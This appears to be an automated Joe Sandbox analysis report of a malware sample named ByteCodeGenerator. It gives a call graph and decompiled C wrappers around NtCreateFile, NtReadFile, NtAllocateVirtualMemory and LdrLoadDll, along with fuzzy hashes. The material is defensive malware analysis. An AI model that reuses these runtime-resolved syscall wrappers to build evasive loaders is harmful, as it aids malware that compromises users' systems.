41af80 LdrLoadDll 32038->32040 32044 3469910 LdrInitializeThunk 32039->32044 32040->32039 32041 41a26b 32041->31639 32043->32031 32044->32041 32046 40a647 32045->32046 32047 40a4a0 LdrLoadDll 32046->32047 32048 40a676 32047->32048 32048->31563 32050 40d6aa 32049->32050 32058 40d760 32049->32058 32051 40a4a0 LdrLoadDll 32050->32051 32052 40d6cc 32051->32052 32059 419f10 32052->32059 32054 40d70e 32062 419f50 32054->32062 32057 41a460 2 API calls 32057->32058 32058->31566 32058->31567 32060 41af80 LdrLoadDll 32059->32060 32061 419f2c 32060->32061 32061->32054 32063 419f6c 32062->32063 32064 41af80 LdrLoadDll 32062->32064 32067 3469fe0 LdrInitializeThunk 32063->32067 32064->32063 32065 40d754 32065->32057 32067->32065 32069 40a2b1 32068->32069 32070 40a2ad 32068->32070 32071 40a2fc 32069->32071 32073 40a2ca 32069->32073 32070->31578 32125 419ca0 LdrLoadDll 32071->32125 32124 419ca0 LdrLoadDll 32073->32124 32074 40a30d 32074->31578 32076 40a2ec 32076->31578 32078 40d810 3 API calls 32077->32078 32079 415026 32078->32079 32079->31580 32081 407e3e 32080->32081 32083 407eec 32080->32083 32082 407220 4 API calls 32081->32082 32085 407e48 32082->32085 32084 407220 4 API calls 32083->32084 32089 407fca 32083->32089 32096 407fac 32083->32096 32087 407f0d 32084->32087 32085->32083 32092 407ee2 32085->32092 32126 407b20 32085->32126 32091 407b20 17 API calls 32087->32091 32093 407fa2 32087->32093 32087->32096 32088 407fc0 32088->31582 32089->31582 32091->32087 32094 4074e0 2 API calls 32092->32094 32095 4074e0 2 API calls 32093->32095 32094->32083 32095->32096 32096->32089 32159 40da80 10 API calls 32096->32159 32098 41af80 LdrLoadDll 32097->32098 32099 41a4ec 32098->32099 32298 34698f0 LdrInitializeThunk 32099->32298 32100 40ad82 32102 40d810 32100->32102 32103 40d82d 32102->32103 32299 419f90 32103->32299 32106 40d875 32106->31586 32107 419fe0 2 API calls 32108 40d89e 32107->32108 32108->31586 32110 419ffc 32109->32110 32111 41af80 LdrLoadDll 32109->32111 32305 3469780 LdrInitializeThunk 32110->32305 32111->32110 32112 40ade5 32112->31592 32112->31595 32115 41af80 LdrLoadDll 32114->32115 32116 41a04c 32115->32116 32306 34697a0 LdrInitializeThunk 32116->32306 32117 40aeb9 32117->31603 32120 41af80 LdrLoadDll 32119->32120 32121 419e0c 32120->32121 32307 3469a20 LdrInitializeThunk 32121->32307 32122 40af0c 32122->31607 32124->32076 32125->32074 32127 407b45 32126->32127 32160 419ce0 32127->32160 32130 407b99 32130->32085 32131 407c1a 32195 40d960 LdrLoadDll NtClose 32131->32195 32132 419ed0 2 API calls 32133 407bbd 32132->32133 32133->32131 32134 407bc8 32133->32134 32136 407c46 32134->32136 32163 40af20 32134->32163 32136->32085 32137 407c35 32139 407c52 32137->32139 32140 407c3c 32137->32140 32196 419d60 LdrLoadDll 32139->32196 32142 41a460 2 API calls 32140->32142 32141 407be2 32141->32136 32183 407950 32141->32183 32142->32136 32144 407c7d 32146 40af20 5 API calls 32144->32146 32148 407c9d 32146->32148 32148->32136 32197 419d90 LdrLoadDll 32148->32197 32150 407cc2 32198 419e20 LdrLoadDll 32150->32198 32152 407cdc 32153 419df0 2 API calls 32152->32153 32154 407ceb 32153->32154 32155 41a460 2 API calls 32154->32155 32156 407cf5 32155->32156 32199 407720 32156->32199 32158 407d09 32158->32085 32159->32088 32161 407b8f 32160->32161 32162 41af80 LdrLoadDll 32160->32162 32161->32130 32161->32131 32161->32132 32162->32161 32166 40af4b 32163->32166 32164 40d810 3 API calls 32165 40afaa 32164->32165 32167 40aff3 32165->32167 32168 419fe0 2 API calls 32165->32168 32166->32164 32167->32141 32169 40afd5 32168->32169 32170 40afdc 32169->32170 32173 40afff 32169->32173 32171 41a030 2 API calls 32170->32171 32172 40afe9 32171->32172 32174 41a460 2 API calls 32172->32174 32175 40b069 32173->32175 32176 40b049 32173->32176 32174->32167 32178 41a030 2 API calls 32175->32178 32177 41a460 2 API calls 32176->32177 32179 40b056 32177->32179 32180 40b07b 32178->32180 32179->32141 32181 41a460 2 API calls 32180->32181 32182 40b085 32181->32182 32182->32141 32184 407966 32183->32184 32215 419850 32184->32215 32186 407af1 32186->32085 32187 40797f 32187->32186 32236 407520 32187->32236 32189 407a65 32189->32186 32190 407720 11 API calls 32189->32190 32191 407a93 32190->32191 32191->32186 32192 419ed0 2 API calls 32191->32192 32193 407ac8 32192->32193 32193->32186 32194 41a4d0 2 API calls 32193->32194 32194->32186 32195->32137 32196->32144 32197->32150 32198->32152 32200 407749 32199->32200 32276 407690 32200->32276 32203 41a4d0 2 API calls 32204 40775c 32203->32204 32204->32203 32205 4077e7 32204->32205 32207 4077e2 32204->32207 32284 40d9e0 32204->32284 32205->32158 32206 41a460 2 API calls 32208 40781a 32206->32208 32207->32206 32208->32205 32209 419ce0 LdrLoadDll 32208->32209 32210 40787f 32209->32210 32210->32205 32288 419d20 32210->32288 32212 4078e3 32212->32205 32213 4156b0 8 API calls 32212->32213 32214 407938 32213->32214 32214->32158 32216 41c0d0 2 API calls 32215->32216 32217 419867 32216->32217 32243 408770 32217->32243 32219 419882 32220 4198c0 32219->32220 32221 4198a9 32219->32221 32224 41be80 2 API calls 32220->32224 32222 41bf00 2 API calls 32221->32222 32223 4198b6 32222->32223 32223->32187 32225 4198fa 32224->32225 32226 41be80 2 API calls 32225->32226 32227 419913 32226->32227 32233 419bb4 32227->32233 32249 41bec0 32227->32249 32230 419ba0 32231 41bf00 2 API calls 32230->32231 32232 419baa 32231->32232 32232->32187 32234 41bf00 2 API calls 32233->32234 32235 419c09 32234->32235 32235->32187 32237 40761f 32236->32237 32238 407535 32236->32238 32237->32189 32238->32237 32239 4156b0 8 API calls 32238->32239 32241 4075a2 32239->32241 32240 4075c9 32240->32189 32241->32240 32242 41bf00 2 API calls 32241->32242 32242->32240 32244 408795 32243->32244 32245 40a150 LdrLoadDll 32244->32245 32246 4087c8 32245->32246 32247 4087ed 32246->32247 32252 40b950 32246->32252 32247->32219 32270 41a550 32249->32270 32253 40b97c 32252->32253 32254 41a1b0 LdrLoadDll 32253->32254 32255 40b995 32254->32255 32256 40b99c 32255->32256 32263 41a1f0 32255->32263 32256->32247 32260 40b9d7 32261 41a460 2 API calls 32260->32261 32262 40b9fa 32261->32262 32262->32247 32264 41af80 LdrLoadDll 32263->32264 32265 41a20c 32264->32265 32269 3469710 LdrInitializeThunk 32265->32269 32266 40b9bf 32266->32256 32268 41a7e0 LdrLoadDll 32266->32268 32268->32260 32269->32266 32271 41af80 LdrLoadDll 32270->32271 32272 41a56c 32271->32272 32275 3469a00 LdrInitializeThunk 32272->32275 32273 419b99 32273->32230 32273->32233 32275->32273 32277 4076a8 32276->32277 32278 40a150 LdrLoadDll 32277->32278 32279 4076c3 32278->32279 32280 415ab0 LdrLoadDll 32279->32280 32281 4076d3 32280->32281 32282 4076dc PostThreadMessageW 32281->32282 32283 4076f0 32281->32283 32282->32283 32283->32204 32285 40d9f3 32284->32285 32291 419e60 32285->32291 32289 41af80 LdrLoadDll 32288->32289 32290 419d3c 32289->32290 32290->32212 32292 419e6f 32291->32292 32293 41af80 LdrLoadDll 32292->32293 32294 419e7c 32293->32294 32297 3469840 LdrInitializeThunk 32294->32297 32295 40da1e 32295->32204 32297->32295 32298->32100 32300 41af80 LdrLoadDll 32299->32300 32301 419fac 32300->32301 32304 34699a0 LdrInitializeThunk 32301->32304 32302 40d86e 32302->32106 32302->32107 32304->32302 32305->32112 32306->32117 32307->32122 32308 3469540 LdrInitializeThunk

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 225 40a150-40a179 call 41cdd0 228 40a17b-40a17e 225->228 229 40a17f-40a18d call 41d1f0 225->229 232 40a19d-40a1ae call 41b520 229->232 233 40a18f-40a19a call 41d470 229->233 238 40a1b0-40a1c4 LdrLoadDll 232->238 239 40a1c7-40a1ca 232->239 233->232 238->239
                                  C-Code - Quality: 100%
                                  			E0040A150(void* __eflags, void* _a4, intOrPtr _a8) {
                                  				char* _v8;
                                  				struct _EXCEPTION_RECORD _v12;
                                  				struct _OBJDIR_INFORMATION _v16;
                                  				char _v536;
                                  				void* _t15;
                                  				struct _OBJDIR_INFORMATION _t17;
                                  				struct _OBJDIR_INFORMATION _t18;
                                  				void* _t30;
                                  				void* _t31;
                                  				void* _t32;
                                  
                                  				_v8 =  &_v536;
                                  				_t15 = E0041CDD0( &_v12, 0x104, _a8);
                                  				_t31 = _t30 + 0xc;
                                  				if(_t15 != 0) {
                                  					_t17 = E0041D1F0(__eflags, _v8);
                                  					_t32 = _t31 + 4;
                                  					__eflags = _t17;
                                  					if(_t17 != 0) {
                                  						E0041D470( &_v12, 0);
                                  						_t32 = _t32 + 8;
                                  					}
                                  					_t18 = E0041B520(_v8);
                                  					_v16 = _t18;
                                  					__eflags = _t18;
                                  					if(_t18 == 0) {
                                  						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                  						return _v16;
                                  					}
                                  					return _t18;
                                  				} else {
                                  					return _t15;
                                  				}
                                  			}













                                  0x0040a16c
                                  0x0040a16f
                                  0x0040a174
                                  0x0040a179
                                  0x0040a183
                                  0x0040a188
                                  0x0040a18b
                                  0x0040a18d
                                  0x0040a195
                                  0x0040a19a
                                  0x0040a19a
                                  0x0040a1a1
                                  0x0040a1a9
                                  0x0040a1ac
                                  0x0040a1ae
                                  0x0040a1c2
                                  0x00000000
                                  0x0040a1c4
                                  0x0040a1ca
                                  0x0040a17e
                                  0x0040a17e
                                  0x0040a17e

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1C2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                  • Instruction ID: 052cc4ce12bc7fce96c5ce05184d9dc08acd6546b0a53663ce47771504bc1bc9
                                  • Opcode Fuzzy Hash: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                  • Instruction Fuzzy Hash: 940152B5E4020DB7DF10DBA1DC42FDEB7789B54308F0041A5A908A7281F634EB54CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 240 41a32f-41a381 call 41af80 NtCreateFile
                                  C-Code - Quality: 79%
                                  			E0041A32F(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                  				long _t21;
                                  
                                  				asm("out 0x55, al");
                                  				_t15 = _a4;
                                  				_t3 = _t15 + 0xc5c; // 0xc5c
                                  				E0041AF80( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                  				return _t21;
                                  			}




                                  0x0041a32f
                                  0x0041a333
                                  0x0041a33f
                                  0x0041a347
                                  0x0041a37d
                                  0x0041a381

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409123,?,00415817,00409123,FFFFFFFF,?,?,FFFFFFFF,00409123,00415817,?,00409123,00000060,00000000,00000000), ref: 0041A37D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 366e58e496f6cfca253afd90544637ba2a05954290b1ae8af67915da666575ad
                                  • Instruction ID: e18525f3cc36c2d3cc87f3896c7548f8c1335f2f53d2b3745802b773a70ed577
                                  • Opcode Fuzzy Hash: 366e58e496f6cfca253afd90544637ba2a05954290b1ae8af67915da666575ad
                                  • Instruction Fuzzy Hash: 29F0CFB2205208AFCB08CF88DC85EEB37ADAF8C754F018208FA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 243 41a330-41a346 244 41a34c-41a381 NtCreateFile 243->244 245 41a347 call 41af80 243->245 245->244
                                  C-Code - Quality: 100%
                                  			E0041A330(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                  				long _t21;
                                  
                                  				_t3 = _a4 + 0xc5c; // 0xc5c
                                  				E0041AF80( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                  				return _t21;
                                  			}




                                  0x0041a33f
                                  0x0041a347
                                  0x0041a37d
                                  0x0041a381

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409123,?,00415817,00409123,FFFFFFFF,?,?,FFFFFFFF,00409123,00415817,?,00409123,00000060,00000000,00000000), ref: 0041A37D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                  • Instruction ID: 6dd853cd48779fa6b418a4b14496c8c01e15a1de5f735ec79afc8c5bd4644814
                                  • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                  • Instruction Fuzzy Hash: 81F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118248BA0997241D630F8518BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 246 41a3e0-41a429 call 41af80 NtReadFile
                                  C-Code - Quality: 16%
                                  			E0041A3E0(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                  				void* _t18;
                                  				intOrPtr* _t28;
                                  				void* _t29;
                                  
                                  				_t13 = _a4;
                                  				_t28 = _a4 + 0xc64;
                                  				E0041AF80( *((intOrPtr*)(_t13 + 0x14)), _t13, _t28,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
                                  				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __esi, _t29);
                                  				asm("rcr byte [esi+0x5d], cl");
                                  				return _t18;
                                  			}






                                  0x0041a3e3
                                  0x0041a3ef
                                  0x0041a3f7
                                  0x0041a425
                                  0x0041a426
                                  0x0041a429

                                  APIs
                                  • NtReadFile.NTDLL(004159D2,5DA515B3,FFFFFFFF,00415691,?,?,004159D2,?,00415691,FFFFFFFF,5DA515B3,004159D2,?,00000000), ref: 0041A425
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                  • Instruction ID: f495372fb2c6f69741db8fb0da72078e6b31e6ee73c8482dd15af9f22055caf4
                                  • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                  • Instruction Fuzzy Hash: 09F0A4B2200208ABCB14DF99DC85EEB77ADAF8C754F118249BA0D97241D630E811CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 249 41a45a-41a45c 250 41a4bd-41a4cd 249->250 251 41a45e-41a489 call 41af80 NtClose 249->251
                                  C-Code - Quality: 45%
                                  			E0041A45A(signed int __eax, intOrPtr __edx, void* __edi, intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				intOrPtr _v117;
                                  				long _t16;
                                  				void* _t17;
                                  				intOrPtr* _t26;
                                  
                                  				if((__eax | 0x00000082) < 0) {
                                  					return  *((intOrPtr*)( *_t26))(_a12, _a16, __edx, _t17);
                                  				} else {
                                  					_v117 = __edx;
                                  					_t13 = _a4;
                                  					_t4 = _t13 + 0x14; // 0x56c29f0f
                                  					_push(_t26);
                                  					_t5 = _t13 + 0xc6c; // 0x409d8f
                                  					E0041AF80( *_t4, _a4, _t5,  *_t4, 0, 0x2c);
                                  					_t16 = NtClose(_a8); // executed
                                  					return _t16;
                                  				}
                                  			}







                                  0x0041a45c
                                  0x0041a4cd
                                  0x0041a45e
                                  0x0041a45f
                                  0x0041a463
                                  0x0041a466
                                  0x0041a469
                                  0x0041a46f
                                  0x0041a477
                                  0x0041a485
                                  0x0041a489
                                  0x0041a489

                                  APIs
                                  • NtClose.NTDLL(004159B0,?,?,004159B0,00409123,FFFFFFFF), ref: 0041A485
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 48d8093fd771d7a64052c9812f20d9ca02a573d1435c40010cac57ba7e060b56
                                  • Instruction ID: d1b15d09d1ed6d75263c384378275aaacd17c8e00b9e0b9514f791066edfe57f
                                  • Opcode Fuzzy Hash: 48d8093fd771d7a64052c9812f20d9ca02a573d1435c40010cac57ba7e060b56
                                  • Instruction Fuzzy Hash: 18F0A0722401047FDB24DFA8DC84EEB7BA9EF88320F008559F94D9B201C530E910CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 255 41a50a-41a54d call 41af80 NtAllocateVirtualMemory
                                  C-Code - Quality: 44%
                                  			E0041A50A(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                  				long _t14;
                                  
                                  				asm("movsb");
                                  				asm("hlt");
                                  				_pop(_t27);
                                  				_push(_t27);
                                  				_t10 = _a4;
                                  				_t3 = _t10 + 0xc7c; // 0x3c7c
                                  				E0041AF80( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                  				return _t14;
                                  			}




                                  0x0041a50c
                                  0x0041a50d
                                  0x0041a50e
                                  0x0041a510
                                  0x0041a513
                                  0x0041a51f
                                  0x0041a527
                                  0x0041a549
                                  0x0041a54d

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B1BD,?,0041B1BD,?,00000000,?,00003000,00000040,00409123,00000000), ref: 0041A549
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 38011506bd9fbf8c14ae78ab83d7225363af6205b1f5dff3fbc2e8e118017648
                                  • Instruction ID: c0e0d0f64de620333cedec469166af53ceb16af080a5a8116c1b76740e2a5bae
                                  • Opcode Fuzzy Hash: 38011506bd9fbf8c14ae78ab83d7225363af6205b1f5dff3fbc2e8e118017648
                                  • Instruction Fuzzy Hash: 99F0F8B6211209ABDB14DF99DC81EE777ADAF8C654F018119BE1D97241CA30F811CBE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 258 41a510-41a526 259 41a52c-41a54d NtAllocateVirtualMemory 258->259 260 41a527 call 41af80 258->260 260->259
                                  C-Code - Quality: 100%
                                  			E0041A510(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                  				long _t14;
                                  
                                  				_t3 = _a4 + 0xc7c; // 0x3c7c
                                  				E0041AF80( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                  				return _t14;
                                  			}




                                  0x0041a51f
                                  0x0041a527
                                  0x0041a549
                                  0x0041a54d

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B1BD,?,0041B1BD,?,00000000,?,00003000,00000040,00409123,00000000), ref: 0041A549
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                  • Instruction ID: 0b2a7c5d6bbf4caaba557ff37d4d689084e4b0ba3d06f620c642aad36687c4a3
                                  • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                  • Instruction Fuzzy Hash: A4F0F2B2210208ABDB14DF89DC81EAB77ADAF88654F018109BA0897241C630E8118BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041A460(intOrPtr _a4, void* _a8) {
                                  				long _t8;
                                  
                                  				_t5 = _a4;
                                  				_t2 = _t5 + 0x14; // 0x56c29f0f
                                  				_t3 = _t5 + 0xc6c; // 0x409d8f
                                  				E0041AF80( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
                                  				_t8 = NtClose(_a8); // executed
                                  				return _t8;
                                  			}




                                  0x0041a463
                                  0x0041a466
                                  0x0041a46f
                                  0x0041a477
                                  0x0041a485
                                  0x0041a489

                                  APIs
                                  • NtClose.NTDLL(004159B0,?,?,004159B0,00409123,FFFFFFFF), ref: 0041A485
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                  • Instruction ID: 47cefd29cfcab73f3f24a2aa21d978ccdac4c73740a6a41c57988fcf0cab5b47
                                  • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                  • Instruction Fuzzy Hash: 6FD01772241214ABD620EB99DC89ED77BACDF48664F018055BA485B242C530FA1086E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 31271d6d8a55b1c6b7c6ca4eaf2c9e0a26fc74350fa5f7b160844e81ff9154a4
                                  • Instruction ID: 8d645ecf9c3628258cb2ca7266458f965db980abad0d7dbc3e2009c5cf96648c
                                  • Opcode Fuzzy Hash: 31271d6d8a55b1c6b7c6ca4eaf2c9e0a26fc74350fa5f7b160844e81ff9154a4
                                  • Instruction Fuzzy Hash: AE90026162184446E200A5794C14B4700059BD1343F51C116A0145954CCB5588616565
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1e008487403376e40c2f8cc3abd98ff0e4e3446288748c10b25cbccfb6b18ec5
                                  • Instruction ID: 166409dea36a3c803751b5eb9a24e40697c61157adf2d857254666e3d07c51b8
                                  • Opcode Fuzzy Hash: 1e008487403376e40c2f8cc3abd98ff0e4e3446288748c10b25cbccfb6b18ec5
                                  • Instruction Fuzzy Hash: 9790027161144806E100A169481474B00059BD1342F51C012A1155955D8765885175B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 58de0ed851a82667615bb6854243612746a4efc77b650bf767bdcc40c94e6092
                                  • Instruction ID: b94e5fd4176df88d55556320f0974be776c2bd82eca4cb3e57bff145531e7fa8
                                  • Opcode Fuzzy Hash: 58de0ed851a82667615bb6854243612746a4efc77b650bf767bdcc40c94e6092
                                  • Instruction Fuzzy Hash: F6900261A11044465140B17988449464005BFE2251751C122A0989950D8799886566A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 729217c8818f1654dfdda5500bcc36c6cb588d05319f6a61d64e9c58bc2a0c71
                                  • Instruction ID: 7b45f16a481a93e5e6a341fe67e2e9de269197f5fe190fdda38bac1ec1af938c
                                  • Opcode Fuzzy Hash: 729217c8818f1654dfdda5500bcc36c6cb588d05319f6a61d64e9c58bc2a0c71
                                  • Instruction Fuzzy Hash: CF9002B161104806E140B169440478600059BD1341F51C012A5055954E87998DD576A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 943705b4e9d39ff60332ceb201590fedcd745ec0c15c26c072ffb26c607747f7
                                  • Instruction ID: bea58112dade2d44eb84ec18d6bf339eaadd1158e0629dd9c58b24ee51a1f1ca
                                  • Opcode Fuzzy Hash: 943705b4e9d39ff60332ceb201590fedcd745ec0c15c26c072ffb26c607747f7
                                  • Instruction Fuzzy Hash: C99002A175104846E100A1694414B460005DBE2341F51C016E1055954D8759CC52716A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 32815766699fc65d16551099cf8225c37082582fe1b9401d0c77260a7443dc66
                                  • Instruction ID: 481231ef97b8bd6862f4f3bde2105b7cd1da3164f70d9fc1b01fb06b7535c782
